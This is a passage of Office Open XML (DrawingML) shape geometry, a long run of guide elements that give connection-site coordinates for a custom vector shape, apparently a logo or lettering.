                <a:gd name="connsiteY327" fmla="*/ 214984 h 430935"/>
                <a:gd name="connsiteX328" fmla="*/ 310979 w 476571"/>
                <a:gd name="connsiteY328" fmla="*/ 215702 h 430935"/>
                <a:gd name="connsiteX329" fmla="*/ 310046 w 476571"/>
                <a:gd name="connsiteY329" fmla="*/ 215682 h 430935"/>
                <a:gd name="connsiteX330" fmla="*/ 306562 w 476571"/>
                <a:gd name="connsiteY330" fmla="*/ 211119 h 430935"/>
                <a:gd name="connsiteX331" fmla="*/ 306562 w 476571"/>
                <a:gd name="connsiteY331" fmla="*/ 201298 h 430935"/>
                <a:gd name="connsiteX332" fmla="*/ 304369 w 476571"/>
                <a:gd name="connsiteY332" fmla="*/ 201298 h 430935"/>
                <a:gd name="connsiteX333" fmla="*/ 304369 w 476571"/>
                <a:gd name="connsiteY333" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX334" fmla="*/ 306562 w 476571"/>
                <a:gd name="connsiteY334" fmla="*/ 199178 h 430935"/>
                <a:gd name="connsiteX335" fmla="*/ 133921 w 476571"/>
                <a:gd name="connsiteY335" fmla="*/ 193380 h 430935"/>
                <a:gd name="connsiteX336" fmla="*/ 135894 w 476571"/>
                <a:gd name="connsiteY336" fmla="*/ 193380 h 430935"/>
                <a:gd name="connsiteX337" fmla="*/ 141690 w 476571"/>
                <a:gd name="connsiteY337" fmla="*/ 211742 h 430935"/>
                <a:gd name="connsiteX338" fmla="*/ 147736 w 476571"/>
                <a:gd name="connsiteY338" fmla="*/ 193442 h 430935"/>
                <a:gd name="connsiteX339" fmla="*/ 150273 w 476571"/>
                <a:gd name="connsiteY339" fmla="*/ 193442 h 430935"/>
                <a:gd name="connsiteX340" fmla="*/ 142692 w 476571"/>
                <a:gd name="connsiteY340" fmla="*/ 215577 h 430935"/>
                <a:gd name="connsiteX341" fmla="*/ 140656 w 476571"/>
                <a:gd name="connsiteY341" fmla="*/ 215577 h 430935"/>
                <a:gd name="connsiteX342" fmla="*/ 134861 w 476571"/>
                <a:gd name="connsiteY342" fmla="*/ 197744 h 430935"/>
                <a:gd name="connsiteX343" fmla="*/ 129003 w 476571"/>
                <a:gd name="connsiteY343" fmla="*/ 215577 h 430935"/>
                <a:gd name="connsiteX344" fmla="*/ 127029 w 476571"/>
                <a:gd name="connsiteY344" fmla="*/ 215577 h 430935"/>
                <a:gd name="connsiteX345" fmla="*/ 119448 w 476571"/>
                <a:gd name="connsiteY345" fmla="*/ 193442 h 430935"/>
                <a:gd name="connsiteX346" fmla="*/ 122048 w 476571"/>
                <a:gd name="connsiteY346" fmla="*/ 193442 h 430935"/>
                <a:gd name="connsiteX347" fmla="*/ 128094 w 476571"/>
                <a:gd name="connsiteY347" fmla="*/ 211742 h 430935"/>
                <a:gd name="connsiteX348" fmla="*/ 204562 w 476571"/>
                <a:gd name="connsiteY348" fmla="*/ 193286 h 430935"/>
                <a:gd name="connsiteX349" fmla="*/ 206755 w 476571"/>
                <a:gd name="connsiteY349" fmla="*/ 193286 h 430935"/>
                <a:gd name="connsiteX350" fmla="*/ 216435 w 476571"/>
                <a:gd name="connsiteY350" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX351" fmla="*/ 213866 w 476571"/>
                <a:gd name="connsiteY351" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX352" fmla="*/ 211392 w 476571"/>
                <a:gd name="connsiteY352" fmla="*/ 209591 h 430935"/>
                <a:gd name="connsiteX353" fmla="*/ 199863 w 476571"/>
                <a:gd name="connsiteY353" fmla="*/ 209591 h 430935"/>
                <a:gd name="connsiteX354" fmla="*/ 197357 w 476571"/>
                <a:gd name="connsiteY354" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX355" fmla="*/ 194882 w 476571"/>
                <a:gd name="connsiteY355" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX356" fmla="*/ 317275 w 476571"/>
                <a:gd name="connsiteY356" fmla="*/ 192975 h 430935"/>
                <a:gd name="connsiteX357" fmla="*/ 319938 w 476571"/>
                <a:gd name="connsiteY357" fmla="*/ 192975 h 430935"/>
                <a:gd name="connsiteX358" fmla="*/ 319938 w 476571"/>
                <a:gd name="connsiteY358" fmla="*/ 195656 h 430935"/>
                <a:gd name="connsiteX359" fmla="*/ 317275 w 476571"/>
                <a:gd name="connsiteY359" fmla="*/ 195656 h 430935"/>
                <a:gd name="connsiteX360" fmla="*/ 265430 w 476571"/>
                <a:gd name="connsiteY360" fmla="*/ 192975 h 430935"/>
                <a:gd name="connsiteX361" fmla="*/ 268093 w 476571"/>
                <a:gd name="connsiteY361" fmla="*/ 192975 h 430935"/>
                <a:gd name="connsiteX362" fmla="*/ 268093 w 476571"/>
                <a:gd name="connsiteY362" fmla="*/ 195656 h 430935"/>
                <a:gd name="connsiteX363" fmla="*/ 265430 w 476571"/>
                <a:gd name="connsiteY363" fmla="*/ 195656 h 430935"/>
                <a:gd name="connsiteX364" fmla="*/ 168631 w 476571"/>
                <a:gd name="connsiteY364" fmla="*/ 192538 h 430935"/>
                <a:gd name="connsiteX365" fmla="*/ 170981 w 476571"/>
                <a:gd name="connsiteY365" fmla="*/ 192538 h 430935"/>
                <a:gd name="connsiteX366" fmla="*/ 170981 w 476571"/>
                <a:gd name="connsiteY366" fmla="*/ 202514 h 430935"/>
                <a:gd name="connsiteX367" fmla="*/ 176964 w 476571"/>
                <a:gd name="connsiteY367" fmla="*/ 198898 h 430935"/>
                <a:gd name="connsiteX368" fmla="*/ 177278 w 476571"/>
                <a:gd name="connsiteY368" fmla="*/ 198917 h 430935"/>
                <a:gd name="connsiteX369" fmla="*/ 184451 w 476571"/>
                <a:gd name="connsiteY369" fmla="*/ 207315 h 430935"/>
                <a:gd name="connsiteX370" fmla="*/ 184469 w 476571"/>
                <a:gd name="connsiteY370" fmla="*/ 207598 h 430935"/>
                <a:gd name="connsiteX371" fmla="*/ 176964 w 476571"/>
                <a:gd name="connsiteY371" fmla="*/ 215764 h 430935"/>
                <a:gd name="connsiteX372" fmla="*/ 170981 w 476571"/>
                <a:gd name="connsiteY372" fmla="*/ 212304 h 430935"/>
                <a:gd name="connsiteX373" fmla="*/ 170981 w 476571"/>
                <a:gd name="connsiteY373" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX374" fmla="*/ 168631 w 476571"/>
                <a:gd name="connsiteY374" fmla="*/ 215421 h 430935"/>
                <a:gd name="connsiteX375" fmla="*/ 258382 w 476571"/>
                <a:gd name="connsiteY375" fmla="*/ 192476 h 430935"/>
                <a:gd name="connsiteX376" fmla="*/ 260700 w 476571"/>
                <a:gd name="connsiteY376" fmla="*/ 192476 h 430935"/>
                <a:gd name="connsiteX377" fmla="*/ 260700 w 476571"/>
                <a:gd name="connsiteY377" fmla="*/ 215390 h 430935"/>
                <a:gd name="connsiteX378" fmla="*/ 258382 w 476571"/>
                <a:gd name="connsiteY378" fmla="*/ 215390 h 430935"/>
                <a:gd name="connsiteX379" fmla="*/ 282158 w 476571"/>
                <a:gd name="connsiteY379" fmla="*/ 137608 h 430935"/>
                <a:gd name="connsiteX380" fmla="*/ 276958 w 476571"/>
                <a:gd name="connsiteY380" fmla="*/ 141411 h 430935"/>
                <a:gd name="connsiteX381" fmla="*/ 276958 w 476571"/>
                <a:gd name="connsiteY381" fmla="*/ 141504 h 430935"/>
                <a:gd name="connsiteX382" fmla="*/ 281062 w 476571"/>
                <a:gd name="connsiteY382" fmla="*/ 144840 h 430935"/>
                <a:gd name="connsiteX383" fmla="*/ 286983 w 476571"/>
                <a:gd name="connsiteY383" fmla="*/ 140008 h 430935"/>
                <a:gd name="connsiteX384" fmla="*/ 286983 w 476571"/>
                <a:gd name="connsiteY384" fmla="*/ 138636 h 430935"/>
                <a:gd name="connsiteX385" fmla="*/ 282158 w 476571"/>
                <a:gd name="connsiteY385" fmla="*/ 137608 h 430935"/>
                <a:gd name="connsiteX386" fmla="*/ 174457 w 476571"/>
                <a:gd name="connsiteY386" fmla="*/ 128410 h 430935"/>
                <a:gd name="connsiteX387" fmla="*/ 173899 w 476571"/>
                <a:gd name="connsiteY387" fmla="*/ 128436 h 430935"/>
                <a:gd name="connsiteX388" fmla="*/ 167566 w 476571"/>
                <a:gd name="connsiteY388" fmla="*/ 135924 h 430935"/>
                <a:gd name="connsiteX389" fmla="*/ 167558 w 476571"/>
                <a:gd name="connsiteY389" fmla="*/ 136095 h 430935"/>
                <a:gd name="connsiteX390" fmla="*/ 174551 w 476571"/>
                <a:gd name="connsiteY390" fmla="*/ 143531 h 430935"/>
                <a:gd name="connsiteX391" fmla="*/ 175044 w 476571"/>
                <a:gd name="connsiteY391" fmla="*/ 143508 h 430935"/>
                <a:gd name="connsiteX392" fmla="*/ 181443 w 476571"/>
                <a:gd name="connsiteY392" fmla="*/ 136018 h 430935"/>
                <a:gd name="connsiteX393" fmla="*/ 181451 w 476571"/>
                <a:gd name="connsiteY393" fmla="*/ 135846 h 430935"/>
                <a:gd name="connsiteX394" fmla="*/ 174457 w 476571"/>
                <a:gd name="connsiteY394" fmla="*/ 128410 h 430935"/>
                <a:gd name="connsiteX395" fmla="*/ 251700 w 476571"/>
                <a:gd name="connsiteY395" fmla="*/ 128401 h 430935"/>
                <a:gd name="connsiteX396" fmla="*/ 246352 w 476571"/>
                <a:gd name="connsiteY396" fmla="*/ 135923 h 430935"/>
                <a:gd name="connsiteX397" fmla="*/ 246352 w 476571"/>
                <a:gd name="connsiteY397" fmla="*/ 135923 h 430935"/>
                <a:gd name="connsiteX398" fmla="*/ 246352 w 476571"/>
                <a:gd name="connsiteY398" fmla="*/ 138124 h 430935"/>
                <a:gd name="connsiteX399" fmla="*/ 253911 w 476571"/>
                <a:gd name="connsiteY399" fmla="*/ 143446 h 430935"/>
                <a:gd name="connsiteX400" fmla="*/ 259259 w 476571"/>
                <a:gd name="connsiteY400" fmla="*/ 135923 h 430935"/>
                <a:gd name="connsiteX401" fmla="*/ 259259 w 476571"/>
                <a:gd name="connsiteY401" fmla="*/ 135923 h 430935"/>
                <a:gd name="connsiteX402" fmla="*/ 259259 w 476571"/>
                <a:gd name="connsiteY402" fmla="*/ 133724 h 430935"/>
                <a:gd name="connsiteX403" fmla="*/ 251700 w 476571"/>
                <a:gd name="connsiteY403" fmla="*/ 128401 h 430935"/>
                <a:gd name="connsiteX404" fmla="*/ 325796 w 476571"/>
                <a:gd name="connsiteY404" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX405" fmla="*/ 333691 w 476571"/>
                <a:gd name="connsiteY405" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX406" fmla="*/ 339737 w 476571"/>
                <a:gd name="connsiteY406" fmla="*/ 140881 h 430935"/>
                <a:gd name="connsiteX407" fmla="*/ 345532 w 476571"/>
                <a:gd name="connsiteY407" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX408" fmla="*/ 353489 w 476571"/>
                <a:gd name="connsiteY408" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX409" fmla="*/ 343308 w 476571"/>
                <a:gd name="connsiteY409" fmla="*/ 150389 h 430935"/>
                <a:gd name="connsiteX410" fmla="*/ 334568 w 476571"/>
                <a:gd name="connsiteY410" fmla="*/ 158089 h 430935"/>
                <a:gd name="connsiteX411" fmla="*/ 327895 w 476571"/>
                <a:gd name="connsiteY411" fmla="*/ 156188 h 430935"/>
                <a:gd name="connsiteX412" fmla="*/ 330433 w 476571"/>
                <a:gd name="connsiteY412" fmla="*/ 150545 h 430935"/>
                <a:gd name="connsiteX413" fmla="*/ 333565 w 476571"/>
                <a:gd name="connsiteY413" fmla="*/ 151636 h 430935"/>
                <a:gd name="connsiteX414" fmla="*/ 336197 w 476571"/>
                <a:gd name="connsiteY414" fmla="*/ 149828 h 430935"/>
                <a:gd name="connsiteX415" fmla="*/ 282253 w 476571"/>
                <a:gd name="connsiteY415" fmla="*/ 121833 h 430935"/>
                <a:gd name="connsiteX416" fmla="*/ 291212 w 476571"/>
                <a:gd name="connsiteY416" fmla="*/ 124950 h 430935"/>
                <a:gd name="connsiteX417" fmla="*/ 294094 w 476571"/>
                <a:gd name="connsiteY417" fmla="*/ 133742 h 430935"/>
                <a:gd name="connsiteX418" fmla="*/ 294094 w 476571"/>
                <a:gd name="connsiteY418" fmla="*/ 149859 h 430935"/>
                <a:gd name="connsiteX419" fmla="*/ 286826 w 476571"/>
                <a:gd name="connsiteY419" fmla="*/ 149859 h 430935"/>
                <a:gd name="connsiteX420" fmla="*/ 286826 w 476571"/>
                <a:gd name="connsiteY420" fmla="*/ 146742 h 430935"/>
                <a:gd name="connsiteX421" fmla="*/ 278806 w 476571"/>
                <a:gd name="connsiteY421" fmla="*/ 150234 h 430935"/>
                <a:gd name="connsiteX422" fmla="*/ 277763 w 476571"/>
                <a:gd name="connsiteY422" fmla="*/ 150266 h 430935"/>
                <a:gd name="connsiteX423" fmla="*/ 269690 w 476571"/>
                <a:gd name="connsiteY423" fmla="*/ 141723 h 430935"/>
                <a:gd name="connsiteX424" fmla="*/ 280373 w 476571"/>
                <a:gd name="connsiteY424" fmla="*/ 132931 h 430935"/>
                <a:gd name="connsiteX425" fmla="*/ 286857 w 476571"/>
                <a:gd name="connsiteY425" fmla="*/ 134053 h 430935"/>
                <a:gd name="connsiteX426" fmla="*/ 286857 w 476571"/>
                <a:gd name="connsiteY426" fmla="*/ 133523 h 430935"/>
                <a:gd name="connsiteX427" fmla="*/ 281187 w 476571"/>
                <a:gd name="connsiteY427" fmla="*/ 128504 h 430935"/>
                <a:gd name="connsiteX428" fmla="*/ 273857 w 476571"/>
                <a:gd name="connsiteY428" fmla="*/ 130001 h 430935"/>
                <a:gd name="connsiteX429" fmla="*/ 271946 w 476571"/>
                <a:gd name="connsiteY429" fmla="*/ 124015 h 430935"/>
                <a:gd name="connsiteX430" fmla="*/ 282253 w 476571"/>
                <a:gd name="connsiteY430" fmla="*/ 121833 h 430935"/>
                <a:gd name="connsiteX431" fmla="*/ 314519 w 476571"/>
                <a:gd name="connsiteY431" fmla="*/ 121677 h 430935"/>
                <a:gd name="connsiteX432" fmla="*/ 323510 w 476571"/>
                <a:gd name="connsiteY432" fmla="*/ 131902 h 430935"/>
                <a:gd name="connsiteX433" fmla="*/ 323510 w 476571"/>
                <a:gd name="connsiteY433" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX434" fmla="*/ 315991 w 476571"/>
                <a:gd name="connsiteY434" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX435" fmla="*/ 315991 w 476571"/>
                <a:gd name="connsiteY435" fmla="*/ 134365 h 430935"/>
                <a:gd name="connsiteX436" fmla="*/ 311449 w 476571"/>
                <a:gd name="connsiteY436" fmla="*/ 128753 h 430935"/>
                <a:gd name="connsiteX437" fmla="*/ 306719 w 476571"/>
                <a:gd name="connsiteY437" fmla="*/ 134365 h 430935"/>
                <a:gd name="connsiteX438" fmla="*/ 306719 w 476571"/>
                <a:gd name="connsiteY438" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX439" fmla="*/ 299200 w 476571"/>
                <a:gd name="connsiteY439" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX440" fmla="*/ 299200 w 476571"/>
                <a:gd name="connsiteY440" fmla="*/ 122176 h 430935"/>
                <a:gd name="connsiteX441" fmla="*/ 306719 w 476571"/>
                <a:gd name="connsiteY441" fmla="*/ 122176 h 430935"/>
                <a:gd name="connsiteX442" fmla="*/ 306719 w 476571"/>
                <a:gd name="connsiteY442" fmla="*/ 126104 h 430935"/>
                <a:gd name="connsiteX443" fmla="*/ 314519 w 476571"/>
                <a:gd name="connsiteY443" fmla="*/ 121677 h 430935"/>
                <a:gd name="connsiteX444" fmla="*/ 254716 w 476571"/>
                <a:gd name="connsiteY444" fmla="*/ 121676 h 430935"/>
                <a:gd name="connsiteX445" fmla="*/ 266777 w 476571"/>
                <a:gd name="connsiteY445" fmla="*/ 135923 h 430935"/>
                <a:gd name="connsiteX446" fmla="*/ 266777 w 476571"/>
                <a:gd name="connsiteY446" fmla="*/ 136017 h 430935"/>
                <a:gd name="connsiteX447" fmla="*/ 254716 w 476571"/>
                <a:gd name="connsiteY447" fmla="*/ 150233 h 430935"/>
                <a:gd name="connsiteX448" fmla="*/ 246446 w 476571"/>
                <a:gd name="connsiteY448" fmla="*/ 146118 h 430935"/>
                <a:gd name="connsiteX449" fmla="*/ 246446 w 476571"/>
                <a:gd name="connsiteY449" fmla="*/ 157933 h 430935"/>
                <a:gd name="connsiteX450" fmla="*/ 238896 w 476571"/>
                <a:gd name="connsiteY450" fmla="*/ 157933 h 430935"/>
                <a:gd name="connsiteX451" fmla="*/ 238896 w 476571"/>
                <a:gd name="connsiteY451" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX452" fmla="*/ 246446 w 476571"/>
                <a:gd name="connsiteY452" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX453" fmla="*/ 246446 w 476571"/>
                <a:gd name="connsiteY453" fmla="*/ 126134 h 430935"/>
                <a:gd name="connsiteX454" fmla="*/ 254716 w 476571"/>
                <a:gd name="connsiteY454" fmla="*/ 121676 h 430935"/>
                <a:gd name="connsiteX455" fmla="*/ 208447 w 476571"/>
                <a:gd name="connsiteY455" fmla="*/ 121583 h 430935"/>
                <a:gd name="connsiteX456" fmla="*/ 215777 w 476571"/>
                <a:gd name="connsiteY456" fmla="*/ 126041 h 430935"/>
                <a:gd name="connsiteX457" fmla="*/ 224518 w 476571"/>
                <a:gd name="connsiteY457" fmla="*/ 121677 h 430935"/>
                <a:gd name="connsiteX458" fmla="*/ 233477 w 476571"/>
                <a:gd name="connsiteY458" fmla="*/ 131808 h 430935"/>
                <a:gd name="connsiteX459" fmla="*/ 233477 w 476571"/>
                <a:gd name="connsiteY459" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX460" fmla="*/ 225927 w 476571"/>
                <a:gd name="connsiteY460" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX461" fmla="*/ 225927 w 476571"/>
                <a:gd name="connsiteY461" fmla="*/ 134365 h 430935"/>
                <a:gd name="connsiteX462" fmla="*/ 221541 w 476571"/>
                <a:gd name="connsiteY462" fmla="*/ 128753 h 430935"/>
                <a:gd name="connsiteX463" fmla="*/ 216968 w 476571"/>
                <a:gd name="connsiteY463" fmla="*/ 134365 h 430935"/>
                <a:gd name="connsiteX464" fmla="*/ 216968 w 476571"/>
                <a:gd name="connsiteY464" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX465" fmla="*/ 209449 w 476571"/>
                <a:gd name="connsiteY465" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX466" fmla="*/ 209449 w 476571"/>
                <a:gd name="connsiteY466" fmla="*/ 134365 h 430935"/>
                <a:gd name="connsiteX467" fmla="*/ 205032 w 476571"/>
                <a:gd name="connsiteY467" fmla="*/ 128753 h 430935"/>
                <a:gd name="connsiteX468" fmla="*/ 200490 w 476571"/>
                <a:gd name="connsiteY468" fmla="*/ 134365 h 430935"/>
                <a:gd name="connsiteX469" fmla="*/ 200490 w 476571"/>
                <a:gd name="connsiteY469" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX470" fmla="*/ 192972 w 476571"/>
                <a:gd name="connsiteY470" fmla="*/ 149641 h 430935"/>
                <a:gd name="connsiteX471" fmla="*/ 192972 w 476571"/>
                <a:gd name="connsiteY471" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX472" fmla="*/ 200490 w 476571"/>
                <a:gd name="connsiteY472" fmla="*/ 122175 h 430935"/>
                <a:gd name="connsiteX473" fmla="*/ 200490 w 476571"/>
                <a:gd name="connsiteY473" fmla="*/ 126104 h 430935"/>
                <a:gd name="connsiteX474" fmla="*/ 208447 w 476571"/>
                <a:gd name="connsiteY474" fmla="*/ 121583 h 430935"/>
                <a:gd name="connsiteX475" fmla="*/ 175175 w 476571"/>
                <a:gd name="connsiteY475" fmla="*/ 121055 h 430935"/>
                <a:gd name="connsiteX476" fmla="*/ 188868 w 476571"/>
                <a:gd name="connsiteY476" fmla="*/ 136018 h 430935"/>
                <a:gd name="connsiteX477" fmla="*/ 188868 w 476571"/>
                <a:gd name="connsiteY477" fmla="*/ 136394 h 430935"/>
                <a:gd name="connsiteX478" fmla="*/ 174457 w 476571"/>
                <a:gd name="connsiteY478" fmla="*/ 150358 h 430935"/>
                <a:gd name="connsiteX479" fmla="*/ 173856 w 476571"/>
                <a:gd name="connsiteY479" fmla="*/ 150356 h 430935"/>
                <a:gd name="connsiteX480" fmla="*/ 160141 w 476571"/>
                <a:gd name="connsiteY480" fmla="*/ 136018 h 430935"/>
                <a:gd name="connsiteX481" fmla="*/ 160141 w 476571"/>
                <a:gd name="connsiteY481" fmla="*/ 134682 h 430935"/>
                <a:gd name="connsiteX482" fmla="*/ 175175 w 476571"/>
                <a:gd name="connsiteY482" fmla="*/ 121055 h 430935"/>
                <a:gd name="connsiteX483" fmla="*/ 143914 w 476571"/>
                <a:gd name="connsiteY483" fmla="*/ 113228 h 430935"/>
                <a:gd name="connsiteX484" fmla="*/ 157604 w 476571"/>
                <a:gd name="connsiteY484" fmla="*/ 118777 h 430935"/>
                <a:gd name="connsiteX485" fmla="*/ 152748 w 476571"/>
                <a:gd name="connsiteY485" fmla="*/ 124607 h 430935"/>
                <a:gd name="connsiteX486" fmla="*/ 143883 w 476571"/>
                <a:gd name="connsiteY486" fmla="*/ 120523 h 430935"/>
                <a:gd name="connsiteX487" fmla="*/ 143564 w 476571"/>
                <a:gd name="connsiteY487" fmla="*/ 120541 h 430935"/>
                <a:gd name="connsiteX488" fmla="*/ 133827 w 476571"/>
                <a:gd name="connsiteY488" fmla="*/ 131747 h 430935"/>
                <a:gd name="connsiteX489" fmla="*/ 133805 w 476571"/>
                <a:gd name="connsiteY489" fmla="*/ 132101 h 430935"/>
                <a:gd name="connsiteX490" fmla="*/ 143883 w 476571"/>
                <a:gd name="connsiteY490" fmla="*/ 143063 h 430935"/>
                <a:gd name="connsiteX491" fmla="*/ 152999 w 476571"/>
                <a:gd name="connsiteY491" fmla="*/ 138823 h 430935"/>
                <a:gd name="connsiteX492" fmla="*/ 157854 w 476571"/>
                <a:gd name="connsiteY492" fmla="*/ 143936 h 430935"/>
                <a:gd name="connsiteX493" fmla="*/ 143632 w 476571"/>
                <a:gd name="connsiteY493" fmla="*/ 150358 h 430935"/>
                <a:gd name="connsiteX494" fmla="*/ 143088 w 476571"/>
                <a:gd name="connsiteY494" fmla="*/ 150347 h 430935"/>
                <a:gd name="connsiteX495" fmla="*/ 125839 w 476571"/>
                <a:gd name="connsiteY495" fmla="*/ 131933 h 430935"/>
                <a:gd name="connsiteX496" fmla="*/ 125823 w 476571"/>
                <a:gd name="connsiteY496" fmla="*/ 131138 h 430935"/>
                <a:gd name="connsiteX497" fmla="*/ 143914 w 476571"/>
                <a:gd name="connsiteY497" fmla="*/ 113228 h 430935"/>
                <a:gd name="connsiteX498" fmla="*/ 247323 w 476571"/>
                <a:gd name="connsiteY498" fmla="*/ 82926 h 430935"/>
                <a:gd name="connsiteX499" fmla="*/ 246864 w 476571"/>
                <a:gd name="connsiteY499" fmla="*/ 82946 h 430935"/>
                <a:gd name="connsiteX500" fmla="*/ 240431 w 476571"/>
                <a:gd name="connsiteY500" fmla="*/ 90408 h 430935"/>
                <a:gd name="connsiteX501" fmla="*/ 240427 w 476571"/>
                <a:gd name="connsiteY501" fmla="*/ 90512 h 430935"/>
                <a:gd name="connsiteX502" fmla="*/ 247417 w 476571"/>
                <a:gd name="connsiteY502" fmla="*/ 97890 h 430935"/>
                <a:gd name="connsiteX503" fmla="*/ 247941 w 476571"/>
                <a:gd name="connsiteY503" fmla="*/ 97868 h 430935"/>
                <a:gd name="connsiteX504" fmla="*/ 254309 w 476571"/>
                <a:gd name="connsiteY504" fmla="*/ 90408 h 430935"/>
                <a:gd name="connsiteX505" fmla="*/ 254313 w 476571"/>
                <a:gd name="connsiteY505" fmla="*/ 90304 h 430935"/>
                <a:gd name="connsiteX506" fmla="*/ 247323 w 476571"/>
                <a:gd name="connsiteY506" fmla="*/ 82926 h 430935"/>
                <a:gd name="connsiteX507" fmla="*/ 248145 w 476571"/>
                <a:gd name="connsiteY507" fmla="*/ 76036 h 430935"/>
                <a:gd name="connsiteX508" fmla="*/ 261890 w 476571"/>
                <a:gd name="connsiteY508" fmla="*/ 90346 h 430935"/>
                <a:gd name="connsiteX509" fmla="*/ 261890 w 476571"/>
                <a:gd name="connsiteY509" fmla="*/ 90722 h 430935"/>
                <a:gd name="connsiteX510" fmla="*/ 247480 w 476571"/>
                <a:gd name="connsiteY510" fmla="*/ 104687 h 430935"/>
                <a:gd name="connsiteX511" fmla="*/ 246846 w 476571"/>
                <a:gd name="connsiteY511" fmla="*/ 104689 h 430935"/>
                <a:gd name="connsiteX512" fmla="*/ 233007 w 476571"/>
                <a:gd name="connsiteY512" fmla="*/ 90408 h 430935"/>
                <a:gd name="connsiteX513" fmla="*/ 233007 w 476571"/>
                <a:gd name="connsiteY513" fmla="*/ 89936 h 430935"/>
                <a:gd name="connsiteX514" fmla="*/ 247480 w 476571"/>
                <a:gd name="connsiteY514" fmla="*/ 76036 h 430935"/>
                <a:gd name="connsiteX515" fmla="*/ 248145 w 476571"/>
                <a:gd name="connsiteY515" fmla="*/ 76036 h 430935"/>
                <a:gd name="connsiteX516" fmla="*/ 267184 w 476571"/>
                <a:gd name="connsiteY516" fmla="*/ 69490 h 430935"/>
                <a:gd name="connsiteX517" fmla="*/ 274734 w 476571"/>
                <a:gd name="connsiteY517" fmla="*/ 69490 h 430935"/>
                <a:gd name="connsiteX518" fmla="*/ 274734 w 476571"/>
                <a:gd name="connsiteY518" fmla="*/ 76535 h 430935"/>
                <a:gd name="connsiteX519" fmla="*/ 280999 w 476571"/>
                <a:gd name="connsiteY519" fmla="*/ 76535 h 430935"/>
                <a:gd name="connsiteX520" fmla="*/ 280999 w 476571"/>
                <a:gd name="connsiteY520" fmla="*/ 83207 h 430935"/>
                <a:gd name="connsiteX521" fmla="*/ 274734 w 476571"/>
                <a:gd name="connsiteY521" fmla="*/ 83207 h 430935"/>
                <a:gd name="connsiteX522" fmla="*/ 274734 w 476571"/>
                <a:gd name="connsiteY522" fmla="*/ 94960 h 430935"/>
                <a:gd name="connsiteX523" fmla="*/ 277146 w 476571"/>
                <a:gd name="connsiteY523" fmla="*/ 97610 h 430935"/>
                <a:gd name="connsiteX524" fmla="*/ 280874 w 476571"/>
                <a:gd name="connsiteY524" fmla="*/ 96644 h 430935"/>
                <a:gd name="connsiteX525" fmla="*/ 280874 w 476571"/>
                <a:gd name="connsiteY525" fmla="*/ 102879 h 430935"/>
                <a:gd name="connsiteX526" fmla="*/ 274922 w 476571"/>
                <a:gd name="connsiteY526" fmla="*/ 104531 h 430935"/>
                <a:gd name="connsiteX527" fmla="*/ 267184 w 476571"/>
                <a:gd name="connsiteY527" fmla="*/ 96269 h 430935"/>
                <a:gd name="connsiteX528" fmla="*/ 267184 w 476571"/>
                <a:gd name="connsiteY528" fmla="*/ 83207 h 430935"/>
                <a:gd name="connsiteX529" fmla="*/ 264052 w 476571"/>
                <a:gd name="connsiteY529" fmla="*/ 83207 h 430935"/>
                <a:gd name="connsiteX530" fmla="*/ 264052 w 476571"/>
                <a:gd name="connsiteY530" fmla="*/ 76535 h 430935"/>
                <a:gd name="connsiteX531" fmla="*/ 267184 w 476571"/>
                <a:gd name="connsiteY531" fmla="*/ 76535 h 430935"/>
                <a:gd name="connsiteX532" fmla="*/ 198673 w 476571"/>
                <a:gd name="connsiteY532" fmla="*/ 68118 h 430935"/>
                <a:gd name="connsiteX533" fmla="*/ 206316 w 476571"/>
                <a:gd name="connsiteY533" fmla="*/ 68118 h 430935"/>
                <a:gd name="connsiteX534" fmla="*/ 206316 w 476571"/>
                <a:gd name="connsiteY534" fmla="*/ 82334 h 430935"/>
                <a:gd name="connsiteX535" fmla="*/ 220382 w 476571"/>
                <a:gd name="connsiteY535" fmla="*/ 82334 h 430935"/>
                <a:gd name="connsiteX536" fmla="*/ 220382 w 476571"/>
                <a:gd name="connsiteY536" fmla="*/ 68118 h 430935"/>
                <a:gd name="connsiteX537" fmla="*/ 227995 w 476571"/>
                <a:gd name="connsiteY537" fmla="*/ 68118 h 430935"/>
                <a:gd name="connsiteX538" fmla="*/ 227995 w 476571"/>
                <a:gd name="connsiteY538" fmla="*/ 104063 h 430935"/>
                <a:gd name="connsiteX539" fmla="*/ 220382 w 476571"/>
                <a:gd name="connsiteY539" fmla="*/ 104063 h 430935"/>
                <a:gd name="connsiteX540" fmla="*/ 220382 w 476571"/>
                <a:gd name="connsiteY540" fmla="*/ 89629 h 430935"/>
                <a:gd name="connsiteX541" fmla="*/ 206316 w 476571"/>
                <a:gd name="connsiteY541" fmla="*/ 89629 h 430935"/>
                <a:gd name="connsiteX542" fmla="*/ 206316 w 476571"/>
                <a:gd name="connsiteY542" fmla="*/ 104063 h 430935"/>
                <a:gd name="connsiteX543" fmla="*/ 198673 w 476571"/>
                <a:gd name="connsiteY543" fmla="*/ 104063 h 430935"/>
                <a:gd name="connsiteX544" fmla="*/ 388356 w 476571"/>
                <a:gd name="connsiteY544" fmla="*/ 15775 h 430935"/>
                <a:gd name="connsiteX545" fmla="*/ 238270 w 476571"/>
                <a:gd name="connsiteY545" fmla="*/ 17022 h 430935"/>
                <a:gd name="connsiteX546" fmla="*/ 88184 w 476571"/>
                <a:gd name="connsiteY546" fmla="*/ 15806 h 430935"/>
                <a:gd name="connsiteX547" fmla="*/ 98334 w 476571"/>
                <a:gd name="connsiteY547" fmla="*/ 271786 h 430935"/>
